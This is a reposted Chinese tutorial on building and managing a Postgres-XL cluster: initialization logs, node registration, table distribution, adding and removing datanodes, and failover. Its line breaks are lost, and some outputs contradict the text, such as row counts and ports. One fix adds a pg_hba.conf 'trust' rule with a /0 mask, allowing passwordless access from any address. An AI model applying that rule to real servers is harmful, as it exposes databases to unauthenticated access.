coord1Starting coordinator master coord22019-05-30 21:13:03.998 EDT [25137] LOG: listening on IPv4 address "0.0.0.0", port 54322019-05-30 21:13:03.998 EDT [25137] LOG: listening on IPv6 address "::", port 54322019-05-30 21:13:04.000 EDT [25137] LOG: listening on Unix socket "/tmp/.s.PGSQL.5432"2019-05-30 21:13:04.038 EDT [25138] LOG: database system was shut down at 2019-05-30 21:13:00 EDT2019-05-30 21:13:04.042 EDT [25137] LOG: database system is ready to accept connections2019-05-30 21:13:04.049 EDT [25145] LOG: cluster monitor started2019-05-30 21:13:04.020 EDT [2730] LOG: listening on IPv4 address "0.0.0.0", port 54322019-05-30 21:13:04.020 EDT [2730] LOG: listening on IPv6 address "::", port 54322019-05-30 21:13:04.021 EDT [2730] LOG: listening on Unix socket "/tmp/.s.PGSQL.5432"2019-05-30 21:13:04.057 EDT [2731] LOG: database system was shut down at 2019-05-30 21:13:00 EDT2019-05-30 21:13:04.061 EDT [2730] LOG: database system is ready to accept connections2019-05-30 21:13:04.062 EDT [2738] LOG: cluster monitor startedDone.Initialize all the datanode masters.Initialize the datanode master datanode1.Initialize the datanode master datanode2.The files belonging to this database system will be owned by user "postgres".This user must also own the server process.The database cluster will be initialized with locale "en_US.UTF-8".The default database encoding has accordingly been set to "UTF8".The default text search configuration will be set to "english".Data page checksums are disabled.fixing permissions on existing directory /home/postgres/pgxc/nodes/datanode/datanode1 ... okcreating subdirectories ... okselecting default max_connections ... 100selecting default shared_buffers ... 128MBselecting dynamic shared memory implementation ... posixcreating configuration files ... okrunning bootstrap script ... okperforming post-bootstrap initialization ... creating cluster information ... oksyncing data to disk ... okfreezing database template0 ... okfreezing database template1 ... okfreezing database postgres ... okWARNING: enabling "trust" authentication for local connectionsYou can change this by editing pg_hba.conf or using the option -A, or--auth-local and --auth-host, the next time you run initdb.Success.The files belonging to this database system will be owned by user "postgres".This user must also own the server process.The database cluster will be initialized with locale "en_US.UTF-8".The default database encoding has accordingly been set to "UTF8".The default text search configuration will be set to "english".Data page checksums are disabled.fixing permissions on existing directory /home/postgres/pgxc/nodes/datanode/datanode2 ... okcreating subdirectories ... okselecting default max_connections ... 100selecting default shared_buffers ... 128MBselecting dynamic shared memory implementation ... posixcreating configuration files ... okrunning bootstrap script ... okperforming post-bootstrap initialization ... creating cluster information ... oksyncing data to disk ... okfreezing database template0 ... okfreezing database template1 ... okfreezing database postgres ... okWARNING: enabling "trust" authentication for local connectionsYou can change this by editing pg_hba.conf or using the option -A, or--auth-local and --auth-host, the next time you run initdb.Success.Done.Starting all the datanode masters.Starting datanode master datanode1.Starting datanode master datanode2.2019-05-30 21:13:12.077 EDT [25392] LOG: listening on IPv4 address "0.0.0.0", port 154322019-05-30 21:13:12.077 EDT [25392] LOG: listening on IPv6 address "::", port 154322019-05-30 21:13:12.079 EDT [25392] LOG: listening on Unix socket "/tmp/.s.PGSQL.15432"2019-05-30 21:13:12.114 EDT [25392] LOG: redirecting log output to logging collector process2019-05-30 21:13:12.114 EDT [25392] HINT: Future log output will appear in directory "pg_log".2019-05-30 21:13:12.079 EDT [2985] LOG: listening on IPv4 address "0.0.0.0", port 154322019-05-30 21:13:12.079 EDT [2985] LOG: listening on IPv6 address "::", port 154322019-05-30 21:13:12.081 EDT [2985] LOG: listening on Unix socket "/tmp/.s.PGSQL.15432"2019-05-30 21:13:12.117 EDT [2985] LOG: redirecting log output to logging collector process2019-05-30 21:13:12.117 EDT [2985] HINT: Future log output will appear in directory "pg_log".Done.psql: FATAL: no pg_hba.conf entry for host "192.168.20.132", user "postgres", database "postgres"psql: FATAL: no pg_hba.conf entry for host "192.168.20.132", user "postgres", database "postgres"Done.psql: FATAL: no pg_hba.conf entry for host "192.168.20.132", user "postgres", database "postgres"psql: FATAL: no pg_hba.conf entry for host "192.168.20.132", user "postgres", database "postgres"Done. 启动 pgxc_ctl -c /home/postgres/pgxc_ctl/pgxc_ctl.conf start all 关闭 pgxc_ctl -c /home/postgres/pgxc_ctl/pgxc_ctl.conf stop all 查看集群状态 [postgres@gtm ~]$ pgxc_ctl monitor all/bin/bashInstalling pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Installing pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Reading configuration using /home/postgres/pgxc_ctl/pgxc_ctl_bash --home /home/postgres/pgxc_ctl --configuration /home/postgres/pgxc_ctl/pgxc_ctl.conf/home/postgres/pgxc_ctl/pgxc_ctl.conf: line 189: $coordExtraConfig: ambiguous redirectFinished reading configuration. PGXC_CTL START Current directory: /home/postgres/pgxc_ctlRunning: gtm masterRunning: coordinator master coord1Running: coordinator master coord2Running: datanode master datanode1Running: datanode master datanode2 配置集群信息 分别在数据节点、协调器节点上分别执行以下命令： 注：本节点只执行修改操作即可(alert node)，其他节点执行创建命令(create node)。因为本节点已经包含本节点的信息。 create node coord1 with (type=coordinator,host=xl1, port=5432);create node coord2 with (type=coordinator,host=xl2, port=5432);alter node coord1 with (type=coordinator,host=xl1, port=5432);alter node coord2 with (type=coordinator,host=xl2, port=5432);create node datanode1 with (type=datanode, host=xl1,port=15432,primary=true,PREFERRED);create node datanode2 with (type=datanode, host=xl2,port=15432);alter node datanode1 with (type=datanode, host=xl1,port=15432,primary=true,PREFERRED);alter node datanode2 with (type=datanode, host=xl2,port=15432);select pgxc_pool_reload(); 分别登陆数据节点、协调器节点验证 postgres= select from pgxc_node;node_name | node_type | node_port | node_host | nodeis_primary | nodeis_preferred | node_id-----------+-----------+-----------+-----------+----------------+------------------+-------------coord1 | C | 5432 | xl1 | f | f | 1885696643coord2 | C | 5432 | xl2 | f | f | -1197102633datanode2 | D | 15432 | xl2 | f | f | -905831925datanode1 | D | 15432 | xl1 | t | f | 888802358(4 rows) 测试 插入数据 在数据节点1，执行相关操作。 通过协调器端口登录PG [postgres@xl1 ~]$ psql -p 5432psql (PGXL 10r1.1, based on PG 10.6 (Postgres-XL 10r1.1))Type "help" for help.postgres= create database lei;CREATE DATABASEpostgres= \c lei;You are now connected to database "lei" as user "postgres".lei= create table test1(id int,name text);CREATE TABLElei= insert into test1(id,name) select generate_series(1,8),'测试';INSERT 0 8lei= select from test1;id | name----+------1 | 测试2 | 测试5 | 测试6 | 测试8 | 测试3 | 测试4 | 测试7 | 测试(8 rows) 注：默认创建的表为分布式表，也就是每个数据节点值存储表的部分数据。关于表类型具体说明，下面有说明。 通过15432端口登录数据节点，查看数据 有5条数据 [postgres@xl1 ~]$ psql -p 15432psql (PGXL 10r1.1, based on PG 10.6 (Postgres-XL 10r1.1))Type "help" for help.postgres= \c lei;You are now connected to database "lei" as user "postgres".lei= select from test1;id | name----+------1 | 测试2 | 测试5 | 测试6 | 测试8 | 测试(5 rows) 登录到节点2，查看数据 有3条数据 [postgres@xl2 ~]$ psql -p15432psql (PGXL 10r1.1, based on PG 10.6 (Postgres-XL 10r1.1))Type "help" for help.postgres= \c lei;You are now connected to database "lei" as user "postgres".lei= select from test1;id | name----+------3 | 测试4 | 测试7 | 测试(3 rows) 两个节点的数据加起来整个8条，没有问题。 至此Postgre-XL集群搭建完成。 创建数据库、表时可能会出现以下错误： ERROR: Failed to get pooled connections 是因为pg_hba.conf配置不对，所有节点加上host all all 192.168.20.0/0 trust并重启集群即可。 ERROR: No Datanode defined in cluster 首先确认是否创建了数据节点，也就是create node相关的命令。如果创建了则执行select pgxc_pool_reload();使其生效即可。 集群管理与应用 表类型说明 REPLICATION表：各个datanode节点中，表的数据完全相同，也就是说，插入数据时，会分别在每个datanode节点插入相同数据。读数据时，只需要读任意一个datanode节点上的数据。 建表语法： CREATE TABLE repltab (col1 int, col2 int) DISTRIBUTE BY REPLICATION; DISTRIBUTE ：会将插入的数据，按照拆分规则，分配到不同的datanode节点中存储，也就是sharding技术。每个datanode节点只保存了部分数据，通过coordinate节点可以查询完整的数据视图。 CREATE TABLE disttab(col1 int, col2 int, col3 text) DISTRIBUTE BY HASH(col1); 模拟数据插入 任意登录一个coordinate节点进行建表操作 [postgres@gtm ~]$ psql -h xl1 -p 5432 -U postgrespostgres= INSERT INTO disttab SELECT generate_series(1,100), generate_series(101, 200), 'foo';INSERT 0 100postgres= INSERT INTO repltab SELECT generate_series(1,100), generate_series(101, 200);INSERT 0 100 查看数据分布结果： DISTRIBUTE表分布结果 postgres= SELECT xc_node_id, count() FROM disttab GROUP BY xc_node_id;xc_node_id | count ------------+-------1148549230 | 42-927910690 | 58(2 rows) REPLICATION表分布结果 postgres= SELECT count() FROM repltab;count -------100(1 row) 查看另一个datanode2中repltab表结果 [postgres@datanode2 pgxl9.5]$ psql -p 15432psql (PGXL 10r1.1, based on PG 10.6 (Postgres-XL 10r1.1))Type "help" for help.postgres= SELECT count() FROM repltab;count -------100(1 row) 结论：REPLICATION表中，datanode1,datanode2中表是全部数据，一模一样。而DISTRIBUTE表，数据散落近乎平均分配到了datanode1,datanode2节点中。 新增数据节点与数据重分布 在线新增节点、并重新分布数据。 新增datanode节点 在gtm集群管理节点上执行pgxc_ctl命令 [postgres@gtm ~]$ pgxc_ctl/bin/bashInstalling pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Installing pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Reading configuration using /home/postgres/pgxc_ctl/pgxc_ctl_bash --home /home/postgres/pgxc_ctl --configuration /home/postgres/pgxc_ctl/pgxc_ctl.confFinished reading configuration. PGXC_CTL START Current directory: /home/postgres/pgxc_ctlPGXC 在服务器xl3上，新增一个master角色的datanode节点，名称是datanode3 端口号暂定5430，pool master暂定6669 ，指定好数据目录位置，从两个节点升级到3个节点，之后要写3个none none应该是datanodeSpecificExtraConfig或者datanodeSpecificExtraPgHba配置PGXC add datanode master datanode3 xl3 15432 6671 /home/postgres/pgxc/nodes/datanode/datanode3 none none none 等待新增完成后，查询集群节点状态： postgres= select from pgxc_node;node_name | node_type | node_port | node_host | nodeis_primary | nodeis_preferred | node_id-----------+-----------+-----------+-----------+----------------+------------------+-------------datanode1 | D | 15432 | xl1 | t | f | 888802358datanode2 | D | 15432 | xl2 | f | f | -905831925datanode3 | D | 15432 | xl3 | f | f | -705831925coord1 | C | 5432 | xl1 | f | f | 1885696643coord2 | C | 5432 | xl2 | f | f | -1197102633(4 rows) 节点新增完毕 数据重新分布 由于新增节点后无法自动完成数据重新分布，需要手动操作。 DISTRIBUTE表分布在了node1,node2节点上，如下： postgres= SELECT xc_node_id, count() FROM disttab GROUP BY xc_node_id;xc_node_id | count ------------+-------1148549230 | 42-927910690 | 58(2 rows) 新增一个节点后，将sharding表数据重新分配到三个节点上，将repl表复制到新节点 重分布sharding表postgres= ALTER TABLE disttab ADD NODE (datanode3);ALTER TABLE 复制数据到新节点postgres= ALTER TABLE repltab ADD NODE (datanode3);ALTER TABLE 查看新的数据分布： postgres= SELECT xc_node_id, count() FROM disttab GROUP BY xc_node_id;xc_node_id | count ------------+--------700122826 | 36-927910690 | 321148549230 | 32(3 rows) 登录datanode3(新增的时候，放在了xl3服务器上，端口15432)节点查看数据： [postgres@gtm ~]$ psql -h xl3 -p 15432 -U postgrespsql (PGXL 10r1.1, based on PG 10.6 (Postgres-XL 10r1.1))Type "help" for help.postgres= select count() from repltab;count -------100(1 row) 很明显,通过 ALTER TABLE tt ADD NODE (dn)命令，可以将DISTRIBUTE表数据重新分布到新节点，重分布过程中会中断所有事务。可以将REPLICATION表数据复制到新节点。 从datanode节点中回收数据 postgres= ALTER TABLE disttab DELETE NODE (datanode3);ALTER TABLEpostgres= ALTER TABLE repltab DELETE NODE (datanode3);ALTER TABLE 删除数据节点 Postgresql-XL并没有检查将被删除的datanode节点是否有replicated/distributed表的数据，为了数据安全，在删除之前需要检查下被删除节点上的数据，有数据的话，要回收掉分配到其他节点，然后才能安全删除。删除数据节点分为四步骤： 1.查询要删除节点dn3的oid postgres= SELECT oid, FROM pgxc_node;oid | node_name | node_type | node_port | node_host | nodeis_primary | nodeis_preferred | node_id -------+-----------+-----------+-----------+-----------+----------------+------------------+-------------11819 | coord1 | C | 5432 | datanode1 | f | f | 188569664316384 | coord2 | C | 5432 | datanode2 | f | f | -119710263316385 | node1 | D | 5433 | datanode1 | f | t | 114854923016386 | node2 | D | 5433 | datanode2 | f | f | -92791069016397 | dn3 | D | 5430 | datanode1 | f | f | -700122826(5 rows) 2.查询dn3对应的oid中是否有数据 testdb= SELECT FROM pgxc_class WHERE nodeoids::integer[] @> ARRAY[16397];pcrelid | pclocatortype | pcattnum | pchashalgorithm | pchashbuckets | nodeoids ---------+---------------+----------+-----------------+---------------+-------------------16388 | H | 1 | 1 | 4096 | 16397 16385 1638616394 | R | 0 | 0 | 0 | 16397 16385 16386(2 rows) 3.有数据的先回收数据 postgres= ALTER TABLE disttab DELETE NODE (dn3);ALTER TABLEpostgres= ALTER TABLE repltab DELETE NODE (dn3);ALTER TABLEpostgres= SELECT FROM pgxc_class WHERE nodeoids::integer[] @> ARRAY[16397];pcrelid | pclocatortype | pcattnum | pchashalgorithm | pchashbuckets | nodeoids ---------+---------------+----------+-----------------+---------------+----------(0 rows) 4.安全删除dn3 PGXC$ remove datanode master dn3 clean 故障节点FAILOVER 1.查看当前集群状态 [postgres@gtm ~]$ psql -h xl1 -p 5432psql (PGXL 10r1.1, based on PG 10.6 (Postgres-XL 10r1.1))Type "help" for help.postgres= SELECT oid, FROM pgxc_node;oid | node_name | node_type | node_port | node_host | nodeis_primary | nodeis_preferred | node_id-------+-----------+-----------+-----------+-----------+----------------+------------------+-------------11739 | coord1 | C | 5432 | xl1 | f | f | 188569664316384 | coord2 | C | 5432 | xl2 | f | f | -119710263316387 | datanode2 | D | 15432 | xl2 | f | f | -90583192516388 | datanode1 | D | 15432 | xl1 | t | t | 888802358(4 rows) 2.模拟datanode1节点故障 直接关闭即可 PGXC stop -m immediate datanode master datanode1Stopping datanode master datanode1.Done. 3.测试查询 只要查询涉及到datanode1上的数据，那么该查询就会报错 postgres= SELECT xc_node_id, count() FROM disttab GROUP BY xc_node_id;WARNING: failed to receive file descriptors for connectionsERROR: Failed to get pooled connectionsHINT: This may happen because one or more nodes are currently unreachable, either because of node or network failure.Its also possible that the target node may have hit the connection limit or the pooler is configured with low connections.Please check if all nodes are running fine and also review max_connections and max_pool_size configuration parameterspostgres= SELECT xc_node_id, FROM disttab WHERE col1 = 3;xc_node_id | col1 | col2 | col3------------+------+------+-------905831925 | 3 | 103 | foo(1 row) 测试发现，查询范围如果涉及到故障的node1节点，会报错，而查询的数据范围不在node1上的话，仍然可以查询。 4.手动切换 要想切换，必须要提前配置slave节点。 PGXC$ failover datanode node1 切换完成后，查询集群 postgres= SELECT oid, FROM pgxc_node;oid | node_name | node_type | node_port | node_host | nodeis_primary | nodeis_preferred | node_id -------+-----------+-----------+-----------+-----------+----------------+------------------+-------------11819 | coord1 | C | 5432 | datanode1 | f | f | 188569664316384 | coord2 | C | 5432 | datanode2 | f | f | -119710263316386 | node2 | D | 15432 | datanode2 | f | f | -92791069016385 | node1 | D | 15433 | datanode2 | f | t | 1148549230(4 rows) 发现datanode1节点的ip和端口都已经替换为配置的slave了。 本篇文章为转载内容。原文链接：https://blog.csdn.net/qianglei6077/article/details/94379331。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。